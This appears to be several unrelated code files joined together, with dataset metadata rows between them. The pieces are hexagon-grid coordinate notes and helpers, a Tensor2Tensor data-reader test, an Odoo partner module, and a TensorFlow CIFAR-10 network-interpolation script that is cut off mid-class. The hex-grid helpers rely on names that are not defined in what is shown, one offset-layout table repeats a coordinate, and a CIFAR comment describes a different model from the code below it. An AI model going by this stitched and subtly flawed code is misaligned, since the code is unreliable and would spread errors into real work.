#     Lines: East, SouthEast, SouthWest, West, NorthWest, NorthEast
#     Edges: SouthEast, South, SouthWest, NorthWest, North, NorthEast
#   pointy
#     Lines: SouthEast, South, SouthWest, NorthWest, North, NorthEast
#     Edges: East, SouthEast, SouthWest, West, NorthWest, NorthEast
# Unicode Character 'WHITE HEXAGON' (U+2B21)
# HTML Entity (decimal) ⬡
# HTML Entity (hex) ⬡
# How to type in Microsoft Windows Alt +2B21
# UTF-8 (hex) 0xE2 0xAC 0xA1 (e2aca1)
# UTF-8 (binary) 11100010:10101100:10100001
# UTF-16 (hex) 0x2B21 (2b21)
# UTF-16 (decimal) 11,041
# UTF-32 (hex) 0x00002B21 (2B21)
# UTF-32 (decimal) 11,041
# C/C++/Java source code "\u2B21"
# Python source code u"\u2B21"
# Unicode Character 'BLACK HEXAGON' (U+2B22)
# HTML Entity (decimal) ⬢
# HTML Entity (hex) ⬢
# How to type in Microsoft Windows Alt +2B22
# UTF-8 (hex) 0xE2 0xAC 0xA2 (e2aca2)
# UTF-8 (binary) 11100010:10101100:10100010
# UTF-16 (hex) 0x2B22 (2b22)
# UTF-16 (decimal) 11,042
# UTF-32 (hex) 0x00002B22 (2b22)
# UTF-32 (decimal) 11,042
# C/C++/Java source code "\u2B22"
# Python source code u"\u2B22"
# hex grid flat, vertical orientation
# Width = HexSize * 2
# horiz = width * 3/4
# height = sqrt(3)/2 * width.
# dist vertical = height.
# hex grid pointy, horizontal orientation
# height = hxsize * 2
# vert = height * 3/4
# width = sqrt(3)/2 * height.
# dist horiz = width.
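
# The grid metrics above as helpers (sketch; each returns
# (width, height, horizontal_spacing, vertical_spacing)):
def FlatHexMetrics(size):
    width = size * 2.0
    height = math.sqrt(3.0) / 2.0 * width
    return (width, height, width * 3.0 / 4.0, height)

def PointyHexMetrics(size):
    height = size * 2.0
    width = math.sqrt(3.0) / 2.0 * height
    return (width, height, width, height * 3.0 / 4.0)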
# offset coords
# Pointy top Pointy top
# "odd-r" Horizontal layout "even-r" Horizontal layout
# (0,0) (1,0) (2,0) (3,0) (4,0) (0,0) (1,0) (2,0) (3,0) (4,0)
# (0,1) (1,1) (2,1) (3,1) (4,1) (0,1) (1,1) (2,1) (3,1) (4,1)
# (0,2) (1,2) (2,2) (3,2) (4,2) (0,2) (1,2) (2,2) (3,2) (4,2)
# (0,3) (1,3) (2,3) (3,3) (4,3) (0,3) (1,3) (2,3) (3,3) (4,3)
# (0,4) (1,4) (2,4) (3,4) (4,4) (0,4) (1,4) (2,4) (3,4) (4,4)
# Flat top Flat top
# "odd-q" Vertical layout "even-q" Vertical layout
# (0,0) (2,0) (4,0) (1,0) (3,0) (5,0)
# (1,0) (3,0) (5,0) (0,0) (2,0) (4,0)
# (0,1) (2,1) (4,1) (1,1) (3,1) (5,1)
# (1,1) (3,1) (4,1) (0,1) (2,1) (4,1)
# (0,2) (2,2) (4,2) (1,2) (3,2) (5,2)
# (1,2) (3,2) (5,2) (0,2) (2,2) (4,2)
# cube coords
# axial coords
# interlaced/doubled coords

# Coord conversions -- the pseudocode from the notes translated to Python
# (bodies follow the notes; Hex/Cube are the namedtuple stand-ins defined
# at the top of this file):
def cube_to_hex(h):  # axial
    q = h.x
    r = h.z
    return Hex(q, r)

def hex_to_cube(h):  # axial
    x = h.q
    z = h.r
    y = -x - z
    return Cube(x, y, z)
# convert cube to even-q offset
col = x
row = z + (x + (x&1)) / 2
# convert even-q offset to cube
x = col
z = row - (col + (col&1)) / 2
y = -x-z
# convert cube to odd-q offset
col = x
row = z + (x - (x&1)) / 2
# convert odd-q offset to cube
x = col
z = row - (col - (col&1)) / 2
y = -x-z
# convert cube to even-r offset
col = x + (z + (z&1)) / 2
row = z
# convert even-r offset to cube
x = col - (row + (row&1)) / 2
z = row
y = -x-z
# convert cube to odd-r offset
col = x + (z - (z&1)) / 2
row = z
# convert odd-r offset to cube
x = col - (row - (row&1)) / 2
z = row
y = -x-z
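# Worked example (editor's sketch): the offset conversions above are
# exact inverses, e.g.
#   oddr_to_cube(cube_to_oddr(Cube(1, -3, 2)))  # -> Cube(x=1, y=-3, z=2)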
# NEIGHBOURS:
# cube
cube_directions = [
    Cube(+1, -1, 0), Cube(+1, 0, -1), Cube(0, +1, -1),
    Cube(-1, +1, 0), Cube(-1, 0, +1), Cube(0, -1, +1),
]

def cube_add(a, b):
    return Cube(a.x + b.x, a.y + b.y, a.z + b.z)

def cube_direction(direction):
    return cube_directions[direction]

def cube_neighbor(hex, direction):
    return cube_add(hex, cube_direction(direction))

# axial
axial_directions = [
    Hex(+1, 0), Hex(+1, -1), Hex(0, -1),
    Hex(-1, 0), Hex(-1, +1), Hex(0, +1),
]

def hex_direction(direction):
    return axial_directions[direction]

def hex_neighbor(hex, direction):
    d = hex_direction(direction)
    return Hex(hex.q + d.q, hex.r + d.r)

# offset: one direction table per grid type; row parity (for the *-r
# layouts) or column parity (for the *-q layouts) picks the sub-table.
odd_r_directions = [
    [Offset(+1, 0), Offset(0, -1), Offset(-1, -1),
     Offset(-1, 0), Offset(-1, +1), Offset(0, +1)],
    [Offset(+1, 0), Offset(+1, -1), Offset(0, -1),
     Offset(-1, 0), Offset(0, +1), Offset(+1, +1)],
]
even_r_directions = [
    [Offset(+1, 0), Offset(+1, -1), Offset(0, -1),
     Offset(-1, 0), Offset(0, +1), Offset(+1, +1)],
    [Offset(+1, 0), Offset(0, -1), Offset(-1, -1),
     Offset(-1, 0), Offset(-1, +1), Offset(0, +1)],
]
odd_q_directions = [
    [Offset(+1, 0), Offset(+1, -1), Offset(0, -1),
     Offset(-1, -1), Offset(-1, 0), Offset(0, +1)],
    [Offset(+1, +1), Offset(+1, 0), Offset(0, -1),
     Offset(-1, 0), Offset(-1, +1), Offset(0, +1)],
]
even_q_directions = [
    [Offset(+1, +1), Offset(+1, 0), Offset(0, -1),
     Offset(-1, 0), Offset(-1, +1), Offset(0, +1)],
    [Offset(+1, 0), Offset(+1, -1), Offset(0, -1),
     Offset(-1, -1), Offset(-1, 0), Offset(0, +1)],
]

def offset_neighbor(hex, direction, directions, use_col_parity):
    parity = (hex.col if use_col_parity else hex.row) & 1
    d = directions[parity][direction]
    return Offset(hex.col + d.col, hex.row + d.row)

# Diagonals (cube coords)
cube_diagonals = [
    Cube(+2, -1, -1), Cube(+1, +1, -2), Cube(-1, +2, -1),
    Cube(-2, +1, +1), Cube(-1, -1, +2), Cube(+1, -2, +1),
]

def cube_diagonal_neighbor(hex, direction):
    return cube_add(hex, cube_diagonals[direction])
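# Worked example (editor's sketch): direction index 0 is "east" in the
# axial table above, so
#   hex_neighbor(Hex(2, 3), 0)                                 # Hex(q=3, r=3)
#   offset_neighbor(Offset(2, 3), 0, odd_r_directions, False)  # Offset(col=3, row=3)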
| gpl-2.0 | -3,974,613,827,194,157,600 | 25.090278 | 69 | 0.534602 | false |
waterblue13/tensor2tensor | tensor2tensor/utils/data_reader_test.py | 1 | 10073 | # coding=utf-8
# Copyright 2017 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Data reader test."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
# Dependency imports
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensor2tensor.data_generators import generator_utils
from tensor2tensor.data_generators import problem as problem_mod
from tensor2tensor.utils import data_reader
from tensor2tensor.utils import registry
import tensorflow as tf
@registry.register_problem
class TestProblem(problem_mod.Problem):
def generator(self, data_dir, tmp_dir, is_training):
for i in xrange(30):
yield {"inputs": [i] * (i + 1), "targets": [i], "floats": [i + 0.5]}
def generate_data(self, data_dir, tmp_dir, task_id=-1):
train_paths = self.training_filepaths(data_dir, 1, shuffled=True)
dev_paths = self.dev_filepaths(data_dir, 1, shuffled=True)
generator_utils.generate_files(
self.generator(data_dir, tmp_dir, True), train_paths)
generator_utils.generate_files(
self.generator(data_dir, tmp_dir, False), dev_paths)
def hparams(self, defaults, model_hparams):
pass
def example_reading_spec(self):
data_fields = {
"inputs": tf.VarLenFeature(tf.int64),
"targets": tf.VarLenFeature(tf.int64),
"floats": tf.VarLenFeature(tf.float32),
}
data_items_to_decoders = None
return (data_fields, data_items_to_decoders)
def preprocess_example(self, example, unused_mode, unused_hparams):
example["new_field"] = tf.constant([42.42])
return example
def generate_test_data(problem, tmp_dir):
problem.generate_data(tmp_dir, tmp_dir)
filepatterns = data_reader.get_data_filepatterns(
problem.name, tmp_dir, tf.estimator.ModeKeys.TRAIN)
assert tf.gfile.Glob(filepatterns[0])
return filepatterns
class DataReaderTest(tf.test.TestCase):
@classmethod
def setUpClass(cls):
tf.set_random_seed(1)
cls.problem = registry.problem("test_problem")
cls.filepatterns = generate_test_data(cls.problem, tempfile.gettempdir())
@classmethod
def tearDownClass(cls):
# Clean up files
for fp in cls.filepatterns:
files = tf.gfile.Glob(fp)
for f in files:
os.remove(f)
def testBasicExampleReading(self):
dataset = data_reader.read_examples(self.problem, self.filepatterns[0], 32)
examples = dataset.make_one_shot_iterator().get_next()
with tf.train.MonitoredSession() as sess:
# Check that there are multiple examples that have the right fields of the
# right type (lists of int/float).
for _ in xrange(10):
ex_val = sess.run(examples)
inputs, targets, floats = (ex_val["inputs"], ex_val["targets"],
ex_val["floats"])
self.assertEqual(np.int64, inputs.dtype)
self.assertEqual(np.int64, targets.dtype)
self.assertEqual(np.float32, floats.dtype)
for field in [inputs, targets, floats]:
self.assertGreater(len(field), 0)
def testTrainEvalBehavior(self):
train_dataset = data_reader.read_examples(self.problem,
self.filepatterns[0], 16)
train_examples = train_dataset.make_one_shot_iterator().get_next()
eval_dataset = data_reader.read_examples(
self.problem,
self.filepatterns[0],
16,
mode=tf.estimator.ModeKeys.EVAL)
eval_examples = eval_dataset.make_one_shot_iterator().get_next()
eval_idxs = []
with tf.train.MonitoredSession() as sess:
# Train should be shuffled and run through infinitely
for i in xrange(30):
self.assertNotEqual(i, sess.run(train_examples)["inputs"][0])
# Eval should not be shuffled and only run through once
for i in xrange(30):
self.assertEqual(i, sess.run(eval_examples)["inputs"][0])
eval_idxs.append(i)
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run(eval_examples)
# Should never run because above line should error
eval_idxs.append(30)
# Ensuring that the above exception handler actually ran and we didn't
# exit the MonitoredSession context.
eval_idxs.append(-1)
self.assertAllEqual(list(range(30)) + [-1], eval_idxs)
def testPreprocess(self):
dataset = data_reader.read_examples(self.problem, self.filepatterns[0], 32)
examples = dataset.make_one_shot_iterator().get_next()
examples = data_reader._preprocess(examples, self.problem, None, None)
with tf.train.MonitoredSession() as sess:
ex_val = sess.run(examples)
# problem.preprocess_example has been run
self.assertAllClose([42.42], ex_val["new_field"])
# int64 has been cast to int32
self.assertEqual(np.int32, ex_val["inputs"].dtype)
self.assertEqual(np.int32, ex_val["targets"].dtype)
self.assertEqual(np.float32, ex_val["floats"].dtype)
def testLengthFilter(self):
max_len = 15
dataset = data_reader.read_examples(self.problem, self.filepatterns[0], 32)
dataset = dataset.filter(
lambda ex: data_reader.example_valid_size(ex, max_len))
examples = dataset.make_one_shot_iterator().get_next()
with tf.train.MonitoredSession() as sess:
ex_lens = []
for _ in xrange(max_len):
ex_lens.append(len(sess.run(examples)["inputs"]))
self.assertAllEqual(list(range(1, max_len + 1)), sorted(ex_lens))
def testBatchingSchemeMaxLength(self):
scheme = data_reader._batching_scheme(
batch_size=20, max_length=None,
min_length_bucket=8, length_bucket_step=1.1,
drop_long_sequences=False)
self.assertGreater(scheme["max_length"], 10000)
scheme = data_reader._batching_scheme(
batch_size=20, max_length=None,
min_length_bucket=8, length_bucket_step=1.1,
drop_long_sequences=True)
self.assertEqual(scheme["max_length"], 20)
scheme = data_reader._batching_scheme(
batch_size=20, max_length=15,
min_length_bucket=8, length_bucket_step=1.1,
drop_long_sequences=True)
self.assertEqual(scheme["max_length"], 15)
scheme = data_reader._batching_scheme(
batch_size=20, max_length=15,
min_length_bucket=8, length_bucket_step=1.1,
drop_long_sequences=False)
self.assertGreater(scheme["max_length"], 10000)
def testBatchingSchemeBuckets(self):
scheme = data_reader._batching_scheme(
batch_size=128,
max_length=0,
min_length_bucket=8,
length_bucket_step=1.1)
boundaries, batch_sizes = scheme["boundaries"], scheme["batch_sizes"]
self.assertEqual(len(boundaries), len(batch_sizes) - 1)
expected_boundaries = [
8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 22, 24, 26, 28,
30, 33, 36, 39, 42, 46, 50, 55, 60, 66, 72, 79, 86, 94, 103, 113, 124]
self.assertEqual(expected_boundaries, boundaries)
expected_batch_sizes = [
16, 12, 12, 8, 8, 8, 8, 8, 8, 6, 6, 6, 6, 4, 4, 4, 4, 4, 3, 3, 3,
3, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1]
self.assertEqual(expected_batch_sizes, batch_sizes)
scheme = data_reader._batching_scheme(
batch_size=128,
max_length=0,
min_length_bucket=8,
length_bucket_step=1.1,
shard_multiplier=2)
boundaries, batch_sizes = scheme["boundaries"], scheme["batch_sizes"]
self.assertAllEqual([bs * 2 for bs in expected_batch_sizes], batch_sizes)
self.assertEqual(expected_boundaries, boundaries)
scheme = data_reader._batching_scheme(
batch_size=128,
max_length=0,
min_length_bucket=8,
length_bucket_step=1.1,
length_multiplier=2)
boundaries, batch_sizes = scheme["boundaries"], scheme["batch_sizes"]
self.assertAllEqual([b * 2 for b in expected_boundaries], boundaries)
self.assertEqual([max(1, bs // 2)
for bs in expected_batch_sizes], batch_sizes)
def testBucketBySeqLength(self):
def example_len(ex):
return tf.shape(ex["inputs"])[0]
boundaries = [10, 20, 30]
batch_sizes = [10, 8, 4, 2]
window_size = 40
dataset = data_reader.read_examples(
self.problem,
self.filepatterns[0],
32,
mode=tf.estimator.ModeKeys.EVAL)
dataset = data_reader.bucket_by_sequence_length(
dataset, example_len,
boundaries, batch_sizes, window_size)
batch = dataset.make_one_shot_iterator().get_next()
input_vals = []
obs_batch_sizes = []
with tf.train.MonitoredSession() as sess:
# Until OutOfRangeError
while True:
batch_val = sess.run(batch)
batch_inputs = batch_val["inputs"]
batch_size, max_len = batch_inputs.shape
obs_batch_sizes.append(batch_size)
for inputs in batch_inputs:
input_val = inputs[0]
input_vals.append(input_val)
# The inputs were constructed such that they were repeated value+1
# times (i.e. if the inputs value is 7, the example has 7 repeated 8
# times).
repeat = input_val + 1
# Check padding
self.assertAllEqual([input_val] * repeat + [0] * (max_len - repeat),
inputs)
# Check that all inputs came through
self.assertEqual(list(range(30)), sorted(input_vals))
# Check that we saw variable batch size
self.assertTrue(len(set(obs_batch_sizes)) > 1)
if __name__ == "__main__":
tf.test.main()
| apache-2.0 | -13,984,561,040,291,444 | 35.103943 | 80 | 0.654026 | false |
CLVsol/odoo_addons | clv_medicament_dispensation_ext/res_partner/res_partner.py | 1 | 1905 | # -*- encoding: utf-8 -*-
################################################################################
# #
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU Affero General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU Affero General Public License for more details. #
# #
# You should have received a copy of the GNU Affero General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
################################################################################
from openerp import models, fields, api
class clv_medicament_dispensation_ext(models.Model):
_inherit = 'clv_medicament_dispensation_ext'
partner_id = fields.Many2one('res.partner', 'Partner')
class res_partner(models.Model):
_inherit = 'res.partner'
medicament_dispensation_ext_ids = fields.One2many('clv_medicament_dispensation_ext',
'partner_id',
'Dispensations (Ext)')
| agpl-3.0 | 3,682,331,894,238,898,700 | 58.53125 | 88 | 0.447244 | false |
danielfreeman11/convex-nets | LaunchScripts/CIFAR10.py | 1 | 29360 | #Imports and model parameters
from __future__ import absolute_import
from __future__ import division
import tensorflow as tf
import numpy as np
from tensorflow.examples.tutorials.mnist import input_data
#mnist = input_data.read_data_sets("/tmp/data/", one_hot=True)
#Simple network: Given three integers a,b,c, [-100,100] chooses three random x-values, and evaluates
#the quadratic function a*x^2 + b*x + c at those values.
import copy
from datetime import datetime
import os.path
import time
import math
import gzip
import os
import re
import sys
import tarfile
from six.moves import urllib
import tensorflow as tf
from tensorflow.models.image.cifar10 import cifar10_input
from tensorflow.models.image.cifar10 import cifar10
for num_run in xrange(1):
alpha,hidden_dim,hidden_dim2 = (.001,4,4)
thresh = .95
if num_run%4 == 0:
thresh = .8
if num_run%4 == 1:
thresh = .6
if num_run%4 == 2:
thresh = .4
if num_run%4 == 3:
thresh = .35
cost_thresh = 1.0
# Parameters
learning_rate = 0.001
training_epochs = 15
#batch_size = 100
display_step = 1
# Network Parameters
n_hidden_1 = 256 # 1st layer number of features
n_hidden_2 = 256 # 2nd layer number of features
n_input = 784 # Guess quadratic function
n_classes = 10 #
#synapses = []
#from __future__ import print_function
tf.logging.set_verbosity(tf.logging.FATAL)
FLAGS = tf.app.flags.FLAGS
# Basic model parameters.
batch_size = 128
data_dir = '/tmp/cifar10_data'
use_fp16 = False
train_dir= '/tmp/cifar10_train'
max_steps=1000000
num_examples=10000
log_device_placement=False
# Global constants describing the CIFAR-10 data set.
IMAGE_SIZE = cifar10_input.IMAGE_SIZE
NUM_CLASSES = cifar10_input.NUM_CLASSES
NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = cifar10_input.NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN
NUM_EXAMPLES_PER_EPOCH_FOR_EVAL = cifar10_input.NUM_EXAMPLES_PER_EPOCH_FOR_EVAL
# Constants describing the training process.
MOVING_AVERAGE_DECAY = 0.9999 # The decay to use for the moving average.
NUM_EPOCHS_PER_DECAY = 350.0 # Epochs after which learning rate decays.
LEARNING_RATE_DECAY_FACTOR = 0.1 # Learning rate decay factor.
INITIAL_LEARNING_RATE = 0.1 # Initial learning rate.
# If a model is trained with multiple GPUs, prefix all Op names with tower_name
# to differentiate the operations. Note that this prefix is removed from the
# names of the summaries when visualizing a model.
TOWER_NAME = 'tower'
DATA_URL = 'http://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz'
models = []
#Testing starting in the same place
#synapse0 = 2*np.random.random((1,hidden_dim)) - 1
#synapse1 = 2*np.random.random((hidden_dim,hidden_dim2)) - 1
#synapse2 = 2*np.random.random((hidden_dim2,1)) - 1
#Function definitions
def func(x,a,b,c):
return x*x*a + x*b + c
def flatten(x):
result = []
for el in x:
if hasattr(el, "__iter__") and not isinstance(el, basestring):
result.extend(flatten(el))
else:
result.append(el)
return result
def generatecandidate4(a,b,c,tot):
candidate = [[np.random.random() for x in xrange(1)] for y in xrange(tot)]
candidatesolutions = [[func(x[0],a,b,c)] for x in candidate]
return (candidate, candidatesolutions)
def synapse_interpolate(synapse1, synapse2, t):
return (synapse2-synapse1)*t + synapse1
def model_interpolate(w1,b1,w2,b2,t):
m1w = w1
m1b = b1
m2w = w2
m2b = b2
mwi = [synapse_interpolate(m1we,m2we,t) for m1we, m2we in zip(m1w,m2w)]
mbi = [synapse_interpolate(m1be,m2be,t) for m1be, m2be in zip(m1b,m2b)]
return mwi, mbi
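    # Editor's note (sketch): model_interpolate traces the straight line in
    # parameter space between two nets; t=0 returns the first model's
    # parameters, t=1 the second's, e.g. the midpoint of two trained nets:
    #   w_mid, b_mid = model_interpolate(w1, b1, w2, b2, 0.5)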
def InterpBeadError(w1,b1, w2,b2, write = False, name = "00"):
errors = []
#xdat,ydat = generatecandidate4(.5, .25, .1, 1000)
#xdat,ydat = mnist.train.next_batch(1000)
#xdat = mnist.test.images
#ydat = mnist.test.labels
#xdat = np.array(xdat)
#ydat = np.array(ydat)
for tt in xrange(20):
#print tt
#accuracy = 0.
t = tt/20.
thiserror = 0
#x0 = tf.placeholder("float", [None, n_input])
#y0 = tf.placeholder("float", [None, n_classes])
weights, biases = model_interpolate(w1,b1,w2,b2, t)
#interp_model = multilayer_perceptron(w=weights, b=biases)
interp_model = convnet(w=weights, b=biases)
with interp_model.g.as_default():
xdat, ydat = cifar10.inputs(eval_data='test')
logit_test = interp_model.predict(xdat)
top_k_op = tf.nn.in_top_k(logit_test, ydat, 1)
pred = interp_model.predict(xdat)
init = tf.initialize_all_variables()
with tf.Session() as sess:
sess.run(init)
tf.train.start_queue_runners(sess=sess)
num_iter = 20
true_count = 0 # Counts the number of correct predictions.
total_sample_count = num_iter * batch_size
step = 0
while step < num_iter:
predictions = sess.run([top_k_op])
true_count += np.sum(predictions)
step += 1
precision = true_count / total_sample_count
print "Accuracy:", precision
#,"\t",tt,weights[0][1][0],weights[0][1][1]
thiserror = 1 - precision
errors.append(thiserror)
if write == True:
with open("f" + str(name) + ".out",'w+') as f:
for e in errors:
f.write(str(e) + "\n")
return max(errors), np.argmax(errors)
def _activation_summary(x):
"""Helper to create summaries for activations.
Creates a summary that provides a histogram of activations.
Creates a summary that measures the sparsity of activations.
Args:
x: Tensor
Returns:
nothing
"""
# Remove 'tower_[0-9]/' from the name in case this is a multi-GPU training
# session. This helps the clarity of presentation on tensorboard.
tensor_name = re.sub('%s_[0-9]*/' % TOWER_NAME, '', x.op.name)
tf.histogram_summary(tensor_name + '/activations', x)
tf.scalar_summary(tensor_name + '/sparsity', tf.nn.zero_fraction(x))
def _variable_on_cpu(name, shape, initializer):
"""Helper to create a Variable stored on CPU memory.
Args:
name: name of the variable
shape: list of ints
initializer: initializer for Variable
Returns:
Variable Tensor
"""
with tf.device('/cpu:0'):
dtype = tf.float16 if False else tf.float32
var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype)
return var
def _variable_with_weight_decay(name, shape, stddev, wd):
"""Helper to create an initialized Variable with weight decay.
Note that the Variable is initialized with a truncated normal distribution.
A weight decay is added only if one is specified.
Args:
name: name of the variable
shape: list of ints
stddev: standard deviation of a truncated Gaussian
wd: add L2Loss weight decay multiplied by this float. If None, weight
decay is not added for this Variable.
Returns:
Variable Tensor
"""
dtype = tf.float16 if False else tf.float32
var = _variable_on_cpu(
name,
shape,
tf.truncated_normal_initializer(stddev=stddev, dtype=dtype))
if wd is not None:
weight_decay = tf.mul(tf.nn.l2_loss(var), wd, name='weight_loss')
tf.add_to_collection('losses', weight_decay)
return var
def distorted_inputs():
"""Construct distorted input for CIFAR training using the Reader ops.
Returns:
images: Images. 4D tensor of [batch_size, IMAGE_SIZE, IMAGE_SIZE, 3] size.
labels: Labels. 1D tensor of [batch_size] size.
Raises:
ValueError: If no data_dir
"""
if not FLAGS.data_dir:
raise ValueError('Please supply a data_dir')
data_dir = os.path.join(FLAGS.data_dir, 'cifar-10-batches-bin')
images, labels = cifar10_input.distorted_inputs(data_dir=data_dir,
batch_size=FLAGS.batch_size)
if False:
images = tf.cast(images, tf.float16)
labels = tf.cast(labels, tf.float16)
return images, labels
def inputs(eval_data):
"""Construct input for CIFAR evaluation using the Reader ops.
Args:
eval_data: bool, indicating if one should use the train or eval data set.
Returns:
images: Images. 4D tensor of [batch_size, IMAGE_SIZE, IMAGE_SIZE, 3] size.
labels: Labels. 1D tensor of [batch_size] size.
Raises:
ValueError: If no data_dir
"""
if not FLAGS.data_dir:
raise ValueError('Please supply a data_dir')
data_dir = os.path.join(FLAGS.data_dir, 'cifar-10-batches-bin')
images, labels = cifar10_input.inputs(eval_data=eval_data,
data_dir=data_dir,
batch_size=FLAGS.batch_size)
if False:
images = tf.cast(images, tf.float16)
labels = tf.cast(labels, tf.float16)
return images, labels
#Class definitions
class convnet():
def __init__(self, w=0, b=0, ind='00'):
self.index = ind
learning_rate = .001
training_epochs = 15
batch_size = 100
display_step = 1
# Network Parameters
n_hidden_1 = 256 # 1st layer number of features
n_hidden_2 = 256 # 2nd layer number of features
n_input = 784 # Guess quadratic function
n_classes = 10 #
self.g = tf.Graph()
self.params = []
with self.g.as_default():
#Note that by default, weights and biases will be initialized to random normal dists
if w==0:
self.weights = {
'c1': _variable_with_weight_decay('c1',shape=[5, 5, 3, 64],stddev=5e-2,wd=0.0),
'c2': _variable_with_weight_decay('c2',shape=[5, 5, 64, 64],stddev=5e-2,wd=0.0),
'fc1': _variable_with_weight_decay('fc1', shape=[2304, 384],stddev=0.04, wd=0.004),
'fc2': _variable_with_weight_decay('fc2', shape=[384, 192],stddev=0.04, wd=0.004),
'out': _variable_with_weight_decay('out', [192, NUM_CLASSES],stddev=1/192.0, wd=0.0)
}
self.weightslist = [self.weights['c1'],self.weights['c2'],self.weights['fc1'],self.weights['fc2'],self.weights['out']]
self.biases = {
'b1': _variable_on_cpu('b1', [64], tf.constant_initializer(0.0)),
'b2': _variable_on_cpu('b2', [64], tf.constant_initializer(0.1)),
'b3': _variable_on_cpu('b3', [384], tf.constant_initializer(0.1)),
'b4': _variable_on_cpu('b4', [192], tf.constant_initializer(0.1)),
'out': _variable_on_cpu('bo', [NUM_CLASSES],tf.constant_initializer(0.0))
}
self.biaseslist = [self.biases['b1'],self.biases['b2'],self.biases['b3'],self.biases['b4'],self.biases['out']]
else:
self.weights = {
'c1': tf.Variable(w[0]),
'c2': tf.Variable(w[1]),
'fc1': tf.Variable(w[2]),
'fc2': tf.Variable(w[3]),
'out': tf.Variable(w[4])
}
self.weightslist = [self.weights['c1'],self.weights['c2'],self.weights['fc1'],self.weights['fc2'],self.weights['out']]
self.biases = {
'b1': tf.Variable(b[0]),
'b2': tf.Variable(b[1]),
'b3': tf.Variable(b[2]),
'b4': tf.Variable(b[3]),
'out': tf.Variable(b[4])
}
self.biaseslist = [self.biases['b1'],self.biases['b2'],self.biases['b3'],self.biases['b4'],self.biases['out']]
self.saver = tf.train.Saver()
def predict(self, x):
with self.g.as_default():
layer_1 = tf.nn.conv2d(x, self.weights['c1'], [1, 1, 1, 1], padding='SAME')
layer_1 = tf.nn.bias_add(layer_1, self.biases['b1'])
layer_1 = tf.nn.relu(layer_1, name='layer_1')
#_activation_summary(layer_1)
pool_1 = tf.nn.max_pool(layer_1, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1],padding='SAME', name='pool1')
norm_1 = tf.nn.lrn(pool_1, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75,name='norm1')
layer_2 = tf.nn.conv2d(norm_1, self.weights['c2'], [1, 1, 1, 1], padding='SAME')
layer_2 = tf.nn.bias_add(layer_2, self.biases['b2'])
layer_2 = tf.nn.relu(layer_2, name='layer_2')
#_activation_summary(layer_2)
norm_2 = tf.nn.lrn(layer_2, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75,name='norm2')
pool_2 = tf.nn.max_pool(norm_2, ksize=[1, 3, 3, 1],strides=[1, 2, 2, 1], padding='SAME', name='pool2')
reshape = tf.reshape(pool_2, [FLAGS.batch_size, -1])
layer_3 = tf.nn.relu(tf.matmul(reshape, self.weights['fc1']) + self.biases['b3'], name='fc1')
#_activation_summary(layer_3)
layer_4 = tf.nn.relu(tf.matmul(layer_3, self.weights['fc2']) + self.biases['b4'], name='fc2')
#_activation_summary(layer_4)
out_layer = tf.add(tf.matmul(layer_4, self.weights['out']), self.biases['out'], name='out')
#_activation_summary(out)
return out_layer
def ReturnParamsAsList(self):
with self.g.as_default():
with tf.Session() as sess:
# Restore variables from disk
self.saver.restore(sess, "/home/dfreeman/PythonFun/tmp/model"+str(self.index)+".ckpt")
return sess.run(self.weightslist), sess.run(self.biaseslist)
class multilayer_perceptron():
#weights = {}
#biases = {}
def __init__(self, w=0, b=0, ind='00'):
self.index = ind #used for reading values from file
#See the filesystem convention below (is this really necessary?)
#I'm going to eschew writing to file for now because I'll be generating too many files
#Currently, the last value of the parameters is stored in self.params to be read
learning_rate = 0.001
training_epochs = 15
batch_size = 100
display_step = 1
# Network Parameters
n_hidden_1 = 256 # 1st layer number of features
n_hidden_2 = 256 # 2nd layer number of features
n_input = 784 # Guess quadratic function
n_classes = 10 #
self.g = tf.Graph()
self.params = []
with self.g.as_default():
#Note that by default, weights and biases will be initialized to random normal dists
if w==0:
self.weights = {
'h1': tf.Variable(tf.random_normal([n_input, n_hidden_1])),
'h2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),
'out': tf.Variable(tf.random_normal([n_hidden_2, n_classes]))
}
self.weightslist = [self.weights['h1'],self.weights['h2'],self.weights['out']]
self.biases = {
'b1': tf.Variable(tf.random_normal([n_hidden_1])),
'b2': tf.Variable(tf.random_normal([n_hidden_2])),
'out': tf.Variable(tf.random_normal([n_classes]))
}
self.biaseslist = [self.biases['b1'],self.biases['b2'],self.biases['out']]
else:
self.weights = {
'h1': tf.Variable(w[0]),
'h2': tf.Variable(w[1]),
'out': tf.Variable(w[2])
}
self.weightslist = [self.weights['h1'],self.weights['h2'],self.weights['out']]
self.biases = {
'b1': tf.Variable(b[0]),
'b2': tf.Variable(b[1]),
'out': tf.Variable(b[2])
}
self.biaseslist = [self.biases['b1'],self.biases['b2'],self.biases['out']]
self.saver = tf.train.Saver()
def UpdateWeights(self, w, b):
with self.g.as_default():
self.weights = {
'h1': tf.Variable(w[0]),
'h2': tf.Variable(w[1]),
'out': tf.Variable(w[2])
}
self.weightslist = [self.weights['h1'],self.weights['h2'],self.weights['out']]
self.biases = {
'b1': tf.Variable(b[0]),
'b2': tf.Variable(b[1]),
'out': tf.Variable(b[2])
}
